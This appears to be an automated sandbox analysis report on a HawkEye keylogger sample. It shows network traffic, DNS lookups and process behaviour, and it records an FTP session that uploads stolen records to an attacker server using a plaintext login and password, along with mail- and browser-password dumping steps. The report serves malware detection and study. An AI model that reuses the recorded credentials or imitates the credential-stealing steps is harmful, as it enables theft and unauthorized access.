                                                                  Aug 10, 2021 16:47:03.624443054 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.624466896 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.624515057 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.626682997 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.626708031 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.626768112 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.628974915 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.629003048 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.629056931 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.631133080 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.631156921 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.631222010 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.633013010 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.633019924 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.633088112 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.634911060 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.634943962 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.635001898 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.636804104 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.636831045 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.636898994 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.686708927 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.772777081 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:48:16.707349062 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.726089001 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.726183891 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.748107910 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.749362946 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.767170906 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.767363071 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.767621994 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.819124937 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.819355011 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.837003946 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.837682962 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.855254889 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.855520010 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.873044014 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.873241901 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.890853882 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.891865015 CEST4974662025192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.909324884 CEST620254974645.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.909648895 CEST4974662025192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.909986019 CEST4974521192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.927596092 CEST214974545.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.928159952 CEST4974662025192.168.2.345.141.152.18
                                                                  Aug 10, 2021 16:48:16.945511103 CEST620254974645.141.152.18192.168.2.3
                                                                  Aug 10, 2021 16:48:16.945641994 CEST4974662025192.168.2.345.141.152.18

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 10, 2021 16:46:51.992109060 CEST5062053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:52.027792931 CEST53506208.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:52.786812067 CEST6493853192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:52.819618940 CEST53649388.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:53.580915928 CEST6015253192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:53.606440067 CEST53601528.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:53.824304104 CEST5754453192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:53.858824015 CEST53575448.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:54.412156105 CEST5598453192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:54.446171999 CEST53559848.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:55.296931982 CEST6418553192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:55.324888945 CEST53641858.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:55.987725019 CEST6511053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:56.015455961 CEST53651108.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:57.095588923 CEST5836153192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:57.123378992 CEST53583618.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:57.848203897 CEST6349253192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:57.880265951 CEST53634928.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:58.790199041 CEST6083153192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:58.816679955 CEST53608318.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:46:59.740109921 CEST6010053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:46:59.768263102 CEST53601008.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:00.503175020 CEST5319553192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:00.534950972 CEST53531958.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:01.173685074 CEST5014153192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:01.207612038 CEST53501418.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:02.121170044 CEST5302353192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:02.156781912 CEST53530238.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:02.892385006 CEST4956353192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:02.925177097 CEST53495638.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:03.236361980 CEST5135253192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:03.269021034 CEST53513528.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:03.596029043 CEST5934953192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:03.629024982 CEST53593498.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:03.645652056 CEST5708453192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:03.679981947 CEST53570848.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:03.688853979 CEST5882353192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:03.713882923 CEST53588238.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:04.500855923 CEST5756853192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:04.538271904 CEST53575688.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:05.334511042 CEST5054053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:05.367644072 CEST53505408.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:05.991631985 CEST5436653192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:06.017340899 CEST53543668.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:06.736274958 CEST5303453192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:06.764453888 CEST53530348.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:24.103511095 CEST5776253192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:24.140403032 CEST53577628.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:28.506854057 CEST5543553192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:28.542598009 CEST53554358.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:47.617676020 CEST5071353192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:47.650687933 CEST53507138.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:48.165157080 CEST5613253192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:48.240035057 CEST53561328.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:48.895066977 CEST5898753192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:49.128357887 CEST53589878.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:49.561104059 CEST5657953192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:49.597024918 CEST53565798.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:49.789418936 CEST6063353192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:49.822038889 CEST53606338.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:50.608778000 CEST6129253192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:50.642127991 CEST53612928.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:51.540833950 CEST6361953192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:51.576519966 CEST53636198.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:52.423635006 CEST6493853192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:52.460983038 CEST53649388.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:54.526727915 CEST6194653192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:54.562757015 CEST53619468.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:56.360480070 CEST6491053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:56.399250031 CEST53649108.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:57.974577904 CEST5212353192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:58.009871006 CEST53521238.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:58.143307924 CEST5613053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:58.179583073 CEST53561308.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:47:58.667742968 CEST5633853192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:47:58.702274084 CEST53563388.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:48:11.134829044 CEST5942053192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:48:11.170924902 CEST53594208.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:48:16.639065981 CEST5878453192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:48:16.686578035 CEST53587848.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:48:36.402700901 CEST6397853192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:48:36.506305933 CEST53639788.8.8.8192.168.2.3
                                                                  Aug 10, 2021 16:48:38.583419085 CEST6293853192.168.2.38.8.8.8
                                                                  Aug 10, 2021 16:48:38.617878914 CEST53629388.8.8.8192.168.2.3

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Aug 10, 2021 16:47:03.236361980 CEST192.168.2.38.8.8.80x1c9cStandard query (0)www.google.comA (IP address)IN (0x0001)
                                                                  Aug 10, 2021 16:47:58.143307924 CEST192.168.2.38.8.8.80x3295Standard query (0)90.168.9.0.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                                                  Aug 10, 2021 16:48:16.639065981 CEST192.168.2.38.8.8.80xa1a3Standard query (0)ftp.badonfashoin.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Aug 10, 2021 16:47:03.269021034 CEST8.8.8.8192.168.2.30x1c9cNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)
                                                                  Aug 10, 2021 16:47:58.179583073 CEST8.8.8.8192.168.2.30x3295Name error (3)90.168.9.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)
                                                                  Aug 10, 2021 16:48:16.686578035 CEST8.8.8.8192.168.2.30xa1a3No error (0)ftp.badonfashoin.com45.141.152.18A (IP address)IN (0x0001)

                                                                  HTTPS Packets

                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                  Aug 10, 2021 16:47:03.378601074 CEST142.250.185.196443192.168.2.349715CN=www.google.com CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEMon Jul 12 05:48:19 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020Mon Oct 04 05:48:18 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                                                  CN=GTS CA 1C3, O=Google Trust Services LLC, C=USCN=GTS Root R1, O=Google Trust Services LLC, C=USThu Aug 13 02:00:42 CEST 2020Thu Sep 30 02:00:42 CEST 2027
                                                                  CN=GTS Root R1, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEFri Jun 19 02:00:42 CEST 2020Fri Jan 28 01:00:42 CET 2028

                                                                  FTP Packets

                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                  Aug 10, 2021 16:48:16.748107910 CEST214974545.141.152.18192.168.2.3220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.
                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.
                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login
                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 50 allowed.220-Local time is now 10:48. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                  Aug 10, 2021 16:48:16.749362946 CEST4974521192.168.2.345.141.152.18USER logs@badonfashoin.com
                                                                  Aug 10, 2021 16:48:16.767363071 CEST214974545.141.152.18192.168.2.3331 User logs@badonfashoin.com OK. Password required
                                                                  Aug 10, 2021 16:48:16.767621994 CEST4974521192.168.2.345.141.152.18PASS sKsYZiIYQn6y
                                                                  Aug 10, 2021 16:48:16.819124937 CEST214974545.141.152.18192.168.2.3230 OK. Current restricted directory is /
                                                                  Aug 10, 2021 16:48:16.837003946 CEST214974545.141.152.18192.168.2.3504 Unknown command
                                                                  Aug 10, 2021 16:48:16.837682962 CEST4974521192.168.2.345.141.152.18PWD
                                                                  Aug 10, 2021 16:48:16.855254889 CEST214974545.141.152.18192.168.2.3257 "/" is your current location
                                                                  Aug 10, 2021 16:48:16.855520010 CEST4974521192.168.2.345.141.152.18TYPE I
                                                                  Aug 10, 2021 16:48:16.873044014 CEST214974545.141.152.18192.168.2.3200 TYPE is now 8-bit binary
                                                                  Aug 10, 2021 16:48:16.873241901 CEST4974521192.168.2.345.141.152.18PASV
                                                                  Aug 10, 2021 16:48:16.890853882 CEST214974545.141.152.18192.168.2.3227 Entering Passive Mode (45,141,152,18,242,73)
                                                                  Aug 10, 2021 16:48:16.909986019 CEST4974521192.168.2.345.141.152.18STOR HawkEye_Keylogger_Stealer_Records_632922 8.10.2021 4:55:54 PM.txt
                                                                  Aug 10, 2021 16:48:16.927596092 CEST214974545.141.152.18192.168.2.3150 Accepted data connection
                                                                  Aug 10, 2021 16:48:16.967284918 CEST214974545.141.152.18192.168.2.3226-File successfully transferred
                                                                  226-File successfully transferred226 0.040 seconds (measured here), 37.78 Kbytes per second

                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  Analysis Process: FukQGQj7cl.exe PID: 4792 Parent PID: 5564

                                                                  General

                                                                  Start time:16:47:00
                                                                  Start date:10/08/2021
                                                                  Path:C:\Users\user\Desktop\FukQGQj7cl.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\FukQGQj7cl.exe'
                                                                  Imagebase:0xa70000
                                                                  File size:1245696 bytes
                                                                  MD5 hash:83F58ECF0778E3B0ACCA8497DF23EF23
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  Analysis Process: InstallUtil.exe PID: 6284 Parent PID: 4792

                                                                  General

                                                                  Start time:16:47:38
                                                                  Start date:10/08/2021
                                                                  Path:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                  Imagebase:0xd60000
                                                                  File size:41064 bytes
                                                                  MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000010.00000002.501178621.00000000084C0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                  • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000010.00000002.501112721.0000000008460000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                  • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Antivirus matches:
                                                                  • Detection: 0%, Metadefender, Browse
                                                                  • Detection: 0%, ReversingLabs
                                                                  Reputation:moderate

                                                                  Analysis Process: vbc.exe PID: 6860 Parent PID: 6284

                                                                  General

                                                                  Start time:16:48:03
                                                                  Start date:10/08/2021
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                  Imagebase:0x400000
                                                                  File size:1171592 bytes
                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000015.00000002.358708597.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Analysis Process: vbc.exe PID: 6852 Parent PID: 6284

                                                                  General

                                                                  Start time:16:48:03
                                                                  Start date:10/08/2021
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                  Imagebase:0x400000
                                                                  File size:1171592 bytes
                                                                  MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis

                                                                  Reset < >